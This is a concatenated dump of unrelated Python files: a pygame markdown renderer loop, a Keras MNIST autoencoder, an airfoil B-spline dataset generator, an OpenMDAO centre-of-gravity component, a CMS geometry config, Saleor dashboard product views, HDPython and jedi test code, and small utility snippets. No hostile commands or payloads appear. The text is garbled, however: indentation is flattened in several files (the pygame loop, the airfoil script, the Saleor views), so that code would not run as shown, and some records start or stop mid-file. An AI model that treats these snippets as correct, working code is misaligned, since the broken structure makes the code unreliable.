md.set_color_code_background(42, 157, 143)
md.set_color_font(41, 50, 65)
md.set_color_hline(41, 50, 65)
#md.set_color_quote(41, 50, 65)
while True:
pygame.draw.rect(screen, (255,255, 255), (0, 0, screenWidth, screenHeight))
# get various input from pygame
pygame_events = pygame.event.get()
mouse_x, mouse_y = pygame.mouse.get_pos()
mouse_pressed = pygame.mouse.get_pressed()
for event in pygame_events: # handle QUIT operation
if event.type == pygame.QUIT:
pygame.quit()
exit()
md.color_font = (41, 50, 65)
md.display(pygame_events, mouse_x, mouse_y, mouse_pressed) # renders the markdown text onto the surface.
pygame.display.flip() # updates pygame window
|
py | 7dfcf58e148435f3b01281d89b3a507bfe899de8 | '''
Denoising Autoencoder on MNIST using Keras
keras 2.0.6
'''
import pandas as pd
import numpy as np
np.random.seed(1337) # for reproducibility
from keras import backend as K
from keras.models import Model
from keras.layers import Input, UpSampling2D
from keras.layers.convolutional import Conv2D, MaxPooling2D
from keras.callbacks import Callback, RemoteMonitor
from keras.utils import np_utils
from keras.utils.layer_utils import print_summary
# enable multi-CPU
import theano
theano.config.openmp = True
monitor = RemoteMonitor(root='http://localhost:9000')
# input image dimensions
img_rows, img_cols = 28, 28
batch_size = 128 # Number of images used in each optimization step
nb_classes = 10 # One class per digit
nb_epoch = 70 # Number of times the whole data is used to learn
# Read the train and test datasets
train = pd.read_csv("mnist/train.csv").values
test = train # output = input
print('train shape:', train.shape)
print('test shape:', test.shape)
# Reshape the data to be used by a Theano CNN. Shape is
# (nb_of_samples, nb_of_color_channels, img_width, img_heigh)
X_train = train[:, 1:].reshape(train.shape[0], 1, img_rows, img_cols)
X_test = test[:, 1:].reshape(test.shape[0], 1, img_rows, img_cols)
in_shape = (1, img_rows, img_cols)
print('in shape:', in_shape)
# Make the value floats in [0;1] instead of int in [0;255]
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
#Display the shapes to check if everything's ok
print('X_train shape:', X_train.shape)
print('X_test shape:', X_test.shape)
input_img = Input(shape=in_shape) # adapt this if using non `channels_first` image data format
x = Conv2D(16, kernel_size=(3,3), activation='relu', padding='same')(input_img)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Conv2D(8, kernel_size=(3,3), activation='relu', padding='same')(x)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Conv2D(8, kernel_size=(3,3), activation='relu', padding='same')(x)
encoded = MaxPooling2D((2, 2), padding='same')(x)
# at this point the representation is (4, 4, 8) i.e. 128-dimensional
x = Conv2D(8, kernel_size=(3,3), activation='relu', padding='same')(encoded)
x = UpSampling2D((2, 2))(x)
x = Conv2D(8, kernel_size=(3,3), activation='relu', padding='same')(x)
x = UpSampling2D((2, 2))(x)
x = Conv2D(16, kernel_size=(3,3), activation='relu')(x)
x = UpSampling2D((2, 2))(x)
decoded = Conv2D(1, kernel_size=(3,3), activation='sigmoid', padding='same')(x)
autoencoder = Model(input_img, decoded)
autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy')
print_summary(autoencoder)
autoencoder.fit(X_train, X_train,
epochs=50,
batch_size=128,
shuffle=True,
validation_data=(X_test, X_test))
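# Note (sketch, not in the original script): as written the model is trained
# clean -> clean; a denoising variant would corrupt only the inputs first, e.g.
#   noise_factor = 0.5
#   X_train_noisy = np.clip(X_train + noise_factor * np.random.normal(size=X_train.shape), 0., 1.)
#   autoencoder.fit(X_train_noisy, X_train, epochs=50, batch_size=128, shuffle=True)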
|
py | 7dfcf75f437fca1d887d5979225c7c143f88dd8e | import matplotlib.pyplot as plt
import numpy as np
import scipy.interpolate as spln
import pyDOE as pd
import matplotlib.animation as anime
import sys
import Images_Generator as ig
import shutil
import os
"""
Airfoil_DataSet_Generator_Randomizer.py
---------------------------------------------
This program is used to create a full Database of airfoil variants based on the RAE-2822 airfoil.
The program requires from the user to enter the mother foil's data as an ASCII or UTF-8 text base format
along with its full directory and the target directory where all the data would be stored. An optional argument
is to enter '-v' after the obligatory arguments in order to get a visual representation of the Database
that was created.
This code shall be used only once per batch as there is no control over the random pattern ganeration
and any new results may not be the same as the old ones.
revision 1: Altered the text data export to facilitate the deformation of the grids and charged this
program with the duty of creating the proper data structure to hold the variants' .geom files
and their respective sdf format images. (6/2021)
Developed by Konstantinos Rekoumis 12/2020 (School of Naval and Marine Engineering NTUA)
"""
#------------- Functions definitions -----------------------------------
def randomizer_ControlPoints(tck,n):
    # inputs are the knot vector, the control points, the spline degree and the number of samples to be created
kn=tck[0]
CP=np.array(tck[1])
k=tck[2]
s1 = pd.lhs(n,samples = 1)
s=[-0.2+0.4*x for x in s1[0,:]]
CP_temp = []
TCK = []
for i in range(n):
for j in range(len(CP[0])):
CP_temp.append((1+s[i])*CP[1,j])
TCK.append([kn,[CP[0,:],CP_temp],k])
CP_temp =[]
return TCK
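# Illustration of the scaling above (values are assumptions): with n=3 the Latin
# hypercube draw s1[0,:] could be [0.1, 0.5, 0.9], giving s = [-0.16, 0.0, 0.16],
# so each variant i keeps the x control points and scales the y control points
# by (1 + s[i]) relative to the mother foil.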
def spline_fitting(points,samples,k=3,s=0):
# ------- B-spline preping ----------
tck,u = spln.splprep([points[:,0],points[:,1]],k=3,s=0)
# ----- Control Points Manipulation--------
CP = np.array(tck[1])
TCK=randomizer_ControlPoints(tck,samples)
# ------- B-splines fitting ----------
# u = np.linspace(0,1,100)
splines = [spln.splev(u,TCK[i]) for i in range(samples)]
return splines
def ran_plot(i):
if i<samples:
line1.set_ydata(up_sides[i][1])
line2.set_ydata(down_sides[i][1])
return line1, line2,
#----------------------------------------------------------------------------
if("__main__"==__name__):
#---------- Open the airfoil file for data entry ----------------------------
#------ RAE 2822 via Online data (Legacy still working tho) -----------------
# points_up = np.zeros((1,2),dtype="float")
# points_down = np.zeros((1,2),dtype="float")
# vv="down"
# samples = 500
# data = open("RAE_2822.txt")
# for line in data:
# if ('0' in line):
# bits=line.split(' ') #text separation
# bits[2]=bits[2].split('\n')[0] #newline char trim
# if (("0.000000" == bits[1]) & ("0.000000" == bits[2]) & (vv!="down")): vv ="down"
# elif(("0.000000" == bits[1]) & ("0.000000" == bits[2]) & (vv=="down")): vv ="up"
# if (vv == "up"):
# points_up=np.append(points_up,[[float(bits[1]),float(bits[2])]],axis=0)
# else:
# points_down=np.append(points_down,[[float(bits[1]),float(bits[2])]],axis=0)
#
# #getting rid of the zeros of the initialization
# points_up=np.delete(points_up,0,0)
# points_down=np.delete(points_down,0,0)
#------ RAE 2822 via mesh points sorting (New) --------------------------------
    if (len(sys.argv)>=2):
        input_file = sys.argv[1]
        if(len(sys.argv)==3):
            directory = sys.argv[2]
        else:
            print("Enter the Database destination directory:")
            directory = input()
    else:
        print("Enter the Mother Foil\'s .geom file name:")
        input_file = input()
        # also ask for the destination directory so it is always defined
        print("Enter the Database destination directory:")
        directory = input()
    points_up = np.zeros((1,2),dtype="float")
    points_down = np.zeros((1,2),dtype="float")
    vv="up"
    samples = 1500
    index = []
    data = open(input_file,"r")
lines=data.readlines()
    lines.pop(0)  # first line useful only for MaPFlow
for line in lines:
bits=line.split(" ")
index.append(bits[0])
if (points_up[-1,1]>0)and(float(bits[2])<0):vv="down"
if vv=="up":
points_up=np.append(points_up,[[float(bits[1]),float(bits[2])]],axis=0)
elif vv=="down":
points_down=np.append(points_down,[[float(bits[1]),float(bits[2])]],axis=0)
#appointing the spline end points
points_up=np.append(points_up,[[1.0,0.0]],axis=0)
points_down=np.append(points_down,[[0.0,0.0]],axis=0)
points_up=np.delete(points_up,0,0)
# points_down=np.delete(points_down,0,0)
up_sides=spline_fitting(points_up,samples)
down_sides=spline_fitting(points_down,samples)
#------------------------------------------------
# # ------ Visualising Area ------------
if (len(sys.argv)==4)and(sys.argv[3] == "-v"):
fig = plt.figure()
plt.plot(points_up[:,0],points_up[:,1],"ro")
plt.plot(points_down[:,0],points_down[:,1],"b*")
fig2 = plt.figure()
for i in range(samples):
plt.plot(up_sides[i][0],up_sides[i][1])
plt.plot(down_sides[i][0],down_sides[i][1])
fig1,ax=plt.subplots()
line1,=ax.plot(up_sides[0][0],up_sides[0][1])
line2,=ax.plot(down_sides[0][0],down_sides[0][1])
plt.axis([-0.1,1.1,-0.5,0.5])
animation=anime.FuncAnimation(fig1,ran_plot,blit=False)
plt.show()
#----------- Data Export -----------------
# # windows test mode----------------------------------
# directory = "C:\\AA_NeuralNetwork_ImagesFolder\\"
# train = "train\\"
# test = "test\\"
# Linux mode --------------------------
# directory = "~/DiplomaThesisData/"
train ="train/"
test ="test/"
DIRS = ""
#Create ROOT Directory
try:
os.mkdir(directory)
print(f"The directory: {directory} has been made.")
except:
print(f"The directory: {directory} already exists.")
try:
os.mkdir(directory+train)
print(f"The directory: {directory+train} has been made.")
except:
print(f"The directory: {directory+train} already exists.")
try:
os.mkdir(directory+test)
print(f"The directory: {directory+test} has been made.")
except:
print(f"The directory: {directory+test} already exists.")
for i in range(samples):
dir =""
if i < int(2*samples/3):
dir = f"{directory+train}#_{i}/"
elif i >= int(2*samples/3):
dir = f"{directory+test}#_{i}/"
try:
os.mkdir(dir)
except:
shutil.rmtree(dir,ignore_errors=True)
os.mkdir(dir)
DIRS += f"{dir}\n"
# lines=""
text=[f"#variant no.{i}\n"]
for j in range(0,len(up_sides[i][0])-1):
# lines += f"{index[j-1]} {up_sides[i][0][j]} {up_sides[i][1][j]}\n"
text.append(f"{up_sides[i][0][j]} {up_sides[i][1][j]}\n")
for j in range(1,len(down_sides[i][0])-1):
# lines += f"{index[j+len(up_sides[i][0])-3]} {down_sides[i][0][j]} {down_sides[i][1][j]}\n"
text.append(f"{down_sides[i][0][j]} {down_sides[i][1][j]}\n")
# lines+="----------- EOF ---------------------"
text.append("----------- EOF ---------------------")
#data export as var.geom file for use with grid manipulation
with open((dir+f"var.geom"),'w') as file:
# file.write(lines)
for line in text:
file.write(line)
#image data export
ig.ImageDatabase(dir,text)
with open("/home/freshstart/DiplomaThesisData/DIRS",'w') as file:
file.write(DIRS)
|
py | 7dfcf82ed2332e403bb3a8f500d8599706e577d3 | from __future__ import print_function, division
import numpy as np
from openmdao.api import ExplicitComponent
try:
from openaerostruct.fortran import OAS_API
fortran_flag = True
data_type = float
except:
fortran_flag = False
data_type = complex
class StructuralCG(ExplicitComponent):
""" Compute center-of-gravity location of the spar elements.
    Parameters
    ----------
    nodes[ny, 3] : numpy array
        Coordinates for each FEM node.
    structural_weight : float
        Weight of the structural spar.
    element_weights[ny-1] : numpy array
        Weight of each FEM element.
    Returns
    -------
    cg_location[3] : numpy array
        Location of the structural spar's cg.
"""
def initialize(self):
self.options.declare('surface', types=dict)
def setup(self):
self.surface = surface = self.options['surface']
self.ny = surface['num_y']
self.add_input('nodes', val=np.zeros((self.ny, 3)), units='m')#, dtype=data_type))
self.add_input('structural_weight', val=0., units='N')
self.add_input('element_weights', val=np.zeros((self.ny-1)), units='N')
self.add_output('cg_location', val=np.zeros((3)), units='m')#, dtype=data_type))
self.declare_partials('*', '*', method='cs')
def compute(self, inputs, outputs):
nodes = inputs['nodes']
structural_weight = inputs['structural_weight']
element_weights = inputs['element_weights']
# Calculate the center-of-gravity location of the spar elements only
center_of_elements = (nodes[1:, :] + nodes[:-1, :]) / 2.
cg_loc = np.sum(center_of_elements.T * element_weights, axis=1) / structural_weight
# If the tube is symmetric, double the computed weight and set the
# y-location of the cg to 0, at the symmetry plane
if self.surface['symmetry']:
cg_loc[1] = 0.
cg_loc *= 2.
outputs['cg_location'] = cg_loc
def compute_partials(self, inputs, partials):
nodes = inputs['nodes']
structural_weight = inputs['structural_weight']
element_weights = inputs['element_weights']
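        # Partials were declared with method='cs' in setup(), so OpenMDAO
        # obtains the derivatives via the complex-step method; no analytic
        # assembly is performed here.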
|
py | 7dfcf98b7910219e34eea892a357453b76030859 | import FWCore.ParameterSet.Config as cms
from Configuration.Eras.Era_Run3_dd4hep_cff import Run3_dd4hep
process = cms.Process("TrackerParametersTest", Run3_dd4hep)
process.load('Configuration.Geometry.GeometryDD4hepExtended2021Reco_cff')
if 'MessageLogger' in process.__dict__:
process.MessageLogger.categories.append('TrackerParametersAnalyzer')
process.MessageLogger.destinations.append('cout')
process.MessageLogger = cms.Service("MessageLogger",
cerr = cms.untracked.PSet(
enable = cms.untracked.bool(False)
),
cout = cms.untracked.PSet(
INFO = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
TrackerParametersAnalyzer = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
enable = cms.untracked.bool(True),
enableStatistics = cms.untracked.bool(True),
noLineBreaks = cms.untracked.bool(True),
threshold = cms.untracked.string('INFO')
),
files = cms.untracked.PSet(
trackerParametersDD4hep = cms.untracked.PSet(
DEBUG = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
ERROR = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
FWKINFO = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
INFO = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
TrackerParametersAnalyzer = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
WARNING = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
noLineBreaks = cms.untracked.bool(True),
threshold = cms.untracked.string('INFO')
)
)
)
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.test = cms.EDAnalyzer("TrackerParametersAnalyzer")
process.Timing = cms.Service("Timing")
process.SimpleMemoryCheck = cms.Service("SimpleMemoryCheck")
process.p1 = cms.Path(process.test)
|
py | 7dfcfa278cd1e9da40ca76e54fbe87830ba3dc17 | __author__ = """Jelle Spijker"""
__email__ = '[email protected]'
__version__ = '0.1.0'
from pint import UnitRegistry, set_application_registry
ureg = UnitRegistry(autoconvert_offset_to_baseunit=True, default_as_delta=False)
ureg.setup_matplotlib(True)
Q_ = ureg.Quantity
set_application_registry(ureg)
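# Illustrative usage of the shared registry (a sketch, not part of this module's
# public API): Q_(25.0, 'degC') builds a quantity, and because the registry is
# created with autoconvert_offset_to_baseunit=True it can be converted directly,
# e.g. Q_(25.0, 'degC').to('kelvin').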
|
py | 7dfcfb3c9e9bb36308e4f6c810fb68bb6d6349c5 | from __future__ import unicode_literals
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.shortcuts import get_object_or_404, redirect
from django.template.response import TemplateResponse
from django.utils.http import is_safe_url
from django.utils.translation import pgettext_lazy
from django.views.decorators.http import require_http_methods
from . import forms
from ...core.utils import get_paginator_items
from ...product.models import (Product, ProductAttribute, ProductClass,
ProductImage, ProductVariant, Stock,
StockLocation)
from ..views import staff_member_required
@staff_member_required
def product_class_list(request):
classes = ProductClass.objects.all().prefetch_related(
'product_attributes', 'variant_attributes')
form = forms.ProductClassForm(request.POST or None)
if form.is_valid():
return redirect('dashboard:product-class-add')
classes = get_paginator_items(classes, 30, request.GET.get('page'))
classes.object_list = [
(pc.pk, pc.name, pc.has_variants, pc.product_attributes.all(),
pc.variant_attributes.all())
for pc in classes.object_list]
ctx = {'form': form, 'product_classes': classes}
return TemplateResponse(request, 'dashboard/product/class_list.html', ctx)
@staff_member_required
def product_class_create(request):
product_class = ProductClass()
form = forms.ProductClassForm(request.POST or None,
instance=product_class)
if form.is_valid():
product_class = form.save()
msg = pgettext_lazy(
'Dashboard message', 'Added product type %s') % product_class
messages.success(request, msg)
return redirect('dashboard:product-class-list')
ctx = {'form': form, 'product_class': product_class}
return TemplateResponse(
request, 'dashboard/product/product_class_form.html', ctx)
@staff_member_required
def product_class_edit(request, pk):
product_class = get_object_or_404(
ProductClass, pk=pk)
form = forms.ProductClassForm(request.POST or None,
instance=product_class)
if form.is_valid():
product_class = form.save()
msg = pgettext_lazy(
'Dashboard message', 'Updated product type %s') % product_class
messages.success(request, msg)
return redirect('dashboard:product-class-update', pk=pk)
ctx = {'form': form, 'product_class': product_class}
return TemplateResponse(
request, 'dashboard/product/product_class_form.html', ctx)
@staff_member_required
def product_class_delete(request, pk):
product_class = get_object_or_404(ProductClass, pk=pk)
products = [str(p) for p in product_class.products.all()]
if request.method == 'POST':
product_class.delete()
messages.success(
request,
pgettext_lazy(
'Dashboard message',
'Deleted product type %s') % product_class)
return redirect('dashboard:product-class-list')
return TemplateResponse(
request,
'dashboard/product/modal_product_class_confirm_delete.html',
{'product_class': product_class, 'products': products})
@staff_member_required
def product_list(request):
products = Product.objects.prefetch_related('images')
product_classes = ProductClass.objects.all()
form = forms.ProductClassSelectorForm(
request.POST or None, product_classes=product_classes)
if form.is_valid():
return redirect('dashboard:product-add',
class_pk=form.cleaned_data['product_cls'])
products = get_paginator_items(products, 30, request.GET.get('page'))
ctx = {'form': form, 'products': products,
'product_classes': product_classes}
return TemplateResponse(request, 'dashboard/product/list.html', ctx)
@staff_member_required
def product_create(request, class_pk):
product_class = get_object_or_404(ProductClass, pk=class_pk)
create_variant = not product_class.has_variants
product = Product()
product.product_class = product_class
product_form = forms.ProductForm(request.POST or None, instance=product)
if create_variant:
variant = ProductVariant(product=product)
variant_form = forms.ProductVariantForm(request.POST or None,
instance=variant,
prefix='variant')
variant_errors = not variant_form.is_valid()
else:
variant_form = None
variant_errors = False
if product_form.is_valid() and not variant_errors:
product = product_form.save()
if create_variant:
variant.product = product
variant_form.save()
msg = pgettext_lazy(
'Dashboard message', 'Added product %s') % product
messages.success(request, msg)
return redirect('dashboard:product-update',
pk=product.pk)
ctx = {'product_form': product_form, 'variant_form': variant_form,
'product': product}
return TemplateResponse(
request, 'dashboard/product/product_form.html', ctx)
@staff_member_required
def product_edit(request, pk):
product = get_object_or_404(
Product.objects.prefetch_related(
'images', 'variants'), pk=pk)
edit_variant = not product.product_class.has_variants
attributes = product.product_class.variant_attributes.prefetch_related(
'values')
images = product.images.all()
variants = product.variants.all()
stock_items = Stock.objects.filter(
variant__in=variants).select_related('variant', 'location')
form = forms.ProductForm(request.POST or None, instance=product)
variants_delete_form = forms.VariantBulkDeleteForm()
stock_delete_form = forms.StockBulkDeleteForm()
if edit_variant:
variant = variants.first()
variant_form = forms.ProductVariantForm(
request.POST or None, instance=variant, prefix='variant')
variant_errors = not variant_form.is_valid()
else:
variant_form = None
variant_errors = False
if form.is_valid() and not variant_errors:
product = form.save()
msg = pgettext_lazy(
'Dashboard message', 'Updated product %s') % product
messages.success(request, msg)
return redirect('dashboard:product-update', pk=product.pk)
ctx = {'attributes': attributes, 'images': images, 'product_form': form,
'product': product, 'stock_delete_form': stock_delete_form,
'stock_items': stock_items, 'variants': variants,
'variants_delete_form': variants_delete_form,
'variant_form': variant_form}
return TemplateResponse(
request, 'dashboard/product/product_form.html', ctx)
@staff_member_required
def product_delete(request, pk):
product = get_object_or_404(Product, pk=pk)
if request.method == 'POST':
product.delete()
messages.success(
request,
pgettext_lazy('Dashboard message', 'Deleted product %s') % product)
return redirect('dashboard:product-list')
return TemplateResponse(
request, 'dashboard/product/modal_product_confirm_delete.html',
{'product': product})
@staff_member_required
def stock_edit(request, product_pk, stock_pk=None):
product = get_object_or_404(Product, pk=product_pk)
if stock_pk:
stock = get_object_or_404(Stock, pk=stock_pk)
else:
stock = Stock()
form = forms.StockForm(request.POST or None, instance=stock,
product=product)
if form.is_valid():
form.save()
messages.success(
request, pgettext_lazy('Dashboard message', 'Saved stock'))
product_url = reverse(
'dashboard:product-update', kwargs={'pk': product_pk})
success_url = request.POST.get('success_url', product_url)
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
ctx = {'form': form, 'product': product, 'stock': stock}
return TemplateResponse(request, 'dashboard/product/stock_form.html', ctx)
@staff_member_required
def stock_delete(request, product_pk, stock_pk):
product = get_object_or_404(Product, pk=product_pk)
stock = get_object_or_404(Stock, pk=stock_pk)
if request.method == 'POST':
stock.delete()
messages.success(
request, pgettext_lazy('Dashboard message', 'Deleted stock'))
success_url = request.POST['success_url']
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
ctx = {'product': product, 'stock': stock}
return TemplateResponse(
request, 'dashboard/product/stock_confirm_delete.html', ctx)
@staff_member_required
@require_http_methods(['POST'])
def stock_bulk_delete(request, product_pk):
product = get_object_or_404(Product, pk=product_pk)
form = forms.StockBulkDeleteForm(request.POST)
if form.is_valid():
form.delete()
success_url = request.POST['success_url']
messages.success(
request, pgettext_lazy('Dashboard message', 'Deleted stock'))
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
return redirect('dashboard:product-update', pk=product.pk)
@staff_member_required
def product_image_edit(request, product_pk, img_pk=None):
product = get_object_or_404(Product, pk=product_pk)
if img_pk:
product_image = get_object_or_404(product.images, pk=img_pk)
else:
product_image = ProductImage(product=product)
show_variants = product.product_class.has_variants
form = forms.ProductImageForm(request.POST or None, request.FILES or None,
instance=product_image)
if form.is_valid():
product_image = form.save()
if img_pk:
msg = pgettext_lazy(
'Dashboard message',
'Updated image %s') % product_image.image.name
else:
msg = pgettext_lazy(
'Dashboard message',
'Added image %s') % product_image.image.name
messages.success(request, msg)
success_url = request.POST['success_url']
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
ctx = {'form': form, 'product': product, 'product_image': product_image,
'show_variants': show_variants}
return TemplateResponse(
request, 'dashboard/product/product_image_form.html', ctx)
@staff_member_required
def product_image_delete(request, product_pk, img_pk):
product = get_object_or_404(Product, pk=product_pk)
product_image = get_object_or_404(product.images, pk=img_pk)
if request.method == 'POST':
product_image.delete()
messages.success(
request,
pgettext_lazy(
'Dashboard message',
'Deleted image %s') % product_image.image.name)
success_url = request.POST['success_url']
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
ctx = {'product': product, 'product_image': product_image}
return TemplateResponse(
request,
'dashboard/product/modal_product_image_confirm_delete.html', ctx)
@staff_member_required
def variant_edit(request, product_pk, variant_pk=None):
product = get_object_or_404(Product.objects.all(),
pk=product_pk)
form_initial = {}
if variant_pk:
variant = get_object_or_404(product.variants.all(),
pk=variant_pk)
else:
variant = ProductVariant(product=product)
form = forms.ProductVariantForm(request.POST or None, instance=variant,
initial=form_initial)
attribute_form = forms.VariantAttributeForm(request.POST or None,
instance=variant)
if all([form.is_valid(), attribute_form.is_valid()]):
form.save()
attribute_form.save()
if variant_pk:
msg = pgettext_lazy(
'Dashboard message',
'Updated variant %s') % variant.name
else:
msg = pgettext_lazy(
'Dashboard message',
'Added variant %s') % variant.name
messages.success(request, msg)
success_url = request.POST['success_url']
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
ctx = {'attribute_form': attribute_form, 'form': form, 'product': product,
'variant': variant}
return TemplateResponse(
request, 'dashboard/product/variant_form.html', ctx)
@staff_member_required
def variant_delete(request, product_pk, variant_pk):
product = get_object_or_404(Product, pk=product_pk)
variant = get_object_or_404(product.variants, pk=variant_pk)
is_only_variant = product.variants.count() == 1
if request.method == 'POST':
variant.delete()
messages.success(
request,
pgettext_lazy(
'Dashboard message', 'Deleted variant %s') % variant.name)
success_url = request.POST['success_url']
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
ctx = {'is_only_variant': is_only_variant, 'product': product,
'variant': variant}
return TemplateResponse(
request,
'dashboard/product/modal_product_variant_confirm_delete.html', ctx)
@staff_member_required
@require_http_methods(['POST'])
def variants_bulk_delete(request, product_pk):
product = get_object_or_404(Product, pk=product_pk)
form = forms.VariantBulkDeleteForm(request.POST)
if form.is_valid():
form.delete()
success_url = request.POST['success_url']
messages.success(
request,
pgettext_lazy('Dashboard message', 'Deleted variants'))
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
return redirect('dashboard:product-update', pk=product.pk)
@staff_member_required
def attribute_list(request):
attributes = [
(attribute.pk, attribute.name, attribute.values.all())
for attribute in ProductAttribute.objects.prefetch_related('values')]
ctx = {'attributes': attributes}
return TemplateResponse(request, 'dashboard/product/attributes/list.html',
ctx)
@staff_member_required
def attribute_edit(request, pk=None):
if pk:
attribute = get_object_or_404(ProductAttribute, pk=pk)
else:
attribute = ProductAttribute()
form = forms.ProductAttributeForm(request.POST or None, instance=attribute)
formset = forms.AttributeChoiceValueFormset(request.POST or None,
request.FILES or None,
instance=attribute)
if all([form.is_valid(), formset.is_valid()]):
attribute = form.save()
formset.save()
msg = pgettext_lazy(
'Dashboard message', 'Updated attribute') if pk else pgettext_lazy(
'Dashboard message', 'Added attribute')
messages.success(request, msg)
return redirect('dashboard:product-attribute-update', pk=attribute.pk)
ctx = {'attribute': attribute, 'form': form, 'formset': formset}
return TemplateResponse(request, 'dashboard/product/attributes/form.html',
ctx)
@staff_member_required
def attribute_delete(request, pk):
attribute = get_object_or_404(ProductAttribute, pk=pk)
if request.method == 'POST':
attribute.delete()
messages.success(
request,
pgettext_lazy(
'Dashboard message',
'Deleted attribute %s') % (attribute.name,))
return redirect('dashboard:product-attributes')
ctx = {'attribute': attribute}
return TemplateResponse(
request, 'dashboard/product/attributes/modal_confirm_delete.html', ctx)
@staff_member_required
def stock_location_list(request):
stock_locations = StockLocation.objects.all()
ctx = {'locations': stock_locations}
return TemplateResponse(
request, 'dashboard/product/stock_locations/list.html', ctx)
@staff_member_required
def stock_location_edit(request, location_pk=None):
if location_pk:
location = get_object_or_404(StockLocation, pk=location_pk)
else:
location = StockLocation()
form = forms.StockLocationForm(request.POST or None, instance=location)
if form.is_valid():
form.save()
msg = pgettext_lazy(
'Dashboard message for stock location',
'Updated location') if location_pk else pgettext_lazy(
'Dashboard message for stock location', 'Added location')
messages.success(request, msg)
return redirect('dashboard:product-stock-location-list')
ctx = {'form': form, 'location': location}
return TemplateResponse(
request, 'dashboard/product/stock_locations/form.html', ctx)
@staff_member_required
def stock_location_delete(request, location_pk):
location = get_object_or_404(StockLocation, pk=location_pk)
stock_count = location.stock_set.count()
if request.method == 'POST':
location.delete()
messages.success(
request, pgettext_lazy(
'Dashboard message for stock location',
'Deleted location %s') % location)
return redirect('dashboard:product-stock-location-list')
ctx = {'location': location, 'stock_count': stock_count}
return TemplateResponse(
request, 'dashboard/product/stock_locations/modal_confirm_delete.html',
ctx)
|
py | 7dfcfb4d8e253672d9648a2069771d316266098b | """
Remove Nth Node From End of List
Given a linked list, remove the n-th node from the end of list and return its head.
Example:
Given linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes 1->2->3->5.
Note:
Given n will always be valid.
Follow up:
Could you do this in one pass?
"""
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def removeNthFromEnd(self, head, n):
"""
:type head: ListNode
:type n: int
:rtype: ListNode
"""
        # init, use dummy to handle the case: remove the first node
dummy = ListNode(-1)
dummy.next = head
slow, fast = dummy, dummy
while n > 0 and fast.next:
n -= 1
fast = fast.next
if n > 0:
return dummy.next
# slow, fast->end
while fast and fast.next:
slow, fast = slow.next, fast.next
# delete node
slow.next = slow.next.next
return dummy.next |
py | 7dfcfb9d64726a679fe412447d282817d458d403 | import matplotlib
import numpy as np
import matplotlib.pyplot as plt
def polyfit(dates, levels, p):
    # convert the datetimes to matplotlib float dates and shift them so the
    # first sample sits at t = 0, which improves the conditioning of the fit;
    # the applied shift is returned so the fit can be evaluated later
    date_num = matplotlib.dates.date2num(dates)
    time_shift = date_num[0]
    y = levels
    shifted_dates = date_num - time_shift
    p_coeff = np.polyfit(shifted_dates, y, p)
    poly = np.poly1d(p_coeff)
    return (poly, time_shift)
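# Usage sketch (names are illustrative; assumes `dates` holds datetime objects
# and `levels` the matching water-level readings):
#   poly, shift = polyfit(dates, levels, 4)
#   fitted = poly(matplotlib.dates.date2num(dates) - shift)
# `fitted` can then be plotted against `dates` alongside the raw readings.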
|
py | 7dfcfbdabfab6f773ff53ae776dc309d4ff42925 |
import unittest
import functools
import argparse
import os,sys,inspect
import copy
from HDPython.base import *
from HDPython.v_symbol import *
from HDPython.v_entity import *
from HDPython.v_list import *
class clk_generator(v_entity):
def __init__(self):
super().__init__()
self.clk = port_out(v_sl())
self.architecture()
@architecture
def architecture(self):
@timed()
def proc():
self.clk << 1
#print("======================")
yield wait_for(10)
self.clk << 0
yield wait_for(10)
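            # one pass of proc() drives clk high for 10 time units and then low
            # for 10 time units, i.e. a 20-unit clock period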
|
py | 7dfcfd0d627e556ac12a03745df817e925291e4e | """
Test compiled module
"""
import os
import jedi
from ..helpers import cwd_at
import pytest
def test_completions(Script):
s = Script('import _ctypes; _ctypes.')
assert len(s.completions()) >= 15
def test_call_signatures_extension(Script):
if os.name == 'nt':
func = 'LoadLibrary'
params = 1
else:
func = 'dlopen'
params = 2
s = Script('import _ctypes; _ctypes.%s(' % (func,))
sigs = s.call_signatures()
assert len(sigs) == 1
assert len(sigs[0].params) == params
def test_call_signatures_stdlib(Script):
s = Script('import math; math.cos(')
sigs = s.call_signatures()
assert len(sigs) == 1
assert len(sigs[0].params) == 1
# Check only on linux 64 bit platform and Python3.4.
@pytest.mark.skipif('sys.platform != "linux" or sys.maxsize <= 2**32 or sys.version_info[:2] != (3, 4)')
@cwd_at('test/test_evaluate')
def test_init_extension_module(Script):
"""
``__init__`` extension modules are also packages and Jedi should understand
that.
Originally coming from #472.
This test was built by the module.c and setup.py combination you can find
in the init_extension_module folder. You can easily build the
`__init__.cpython-34m.so` by compiling it (create a virtualenv and run
`setup.py install`.
This is also why this test only runs on certain systems (and Python 3.4).
"""
s = jedi.Script('import init_extension_module as i\ni.', path='not_existing.py')
assert 'foo' in [c.name for c in s.completions()]
s = jedi.Script('from init_extension_module import foo\nfoo', path='not_existing.py')
assert ['foo'] == [c.name for c in s.completions()]
|
py | 7dfcfd9d0ceea8562bb42d422e6ac153f4b846c5 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
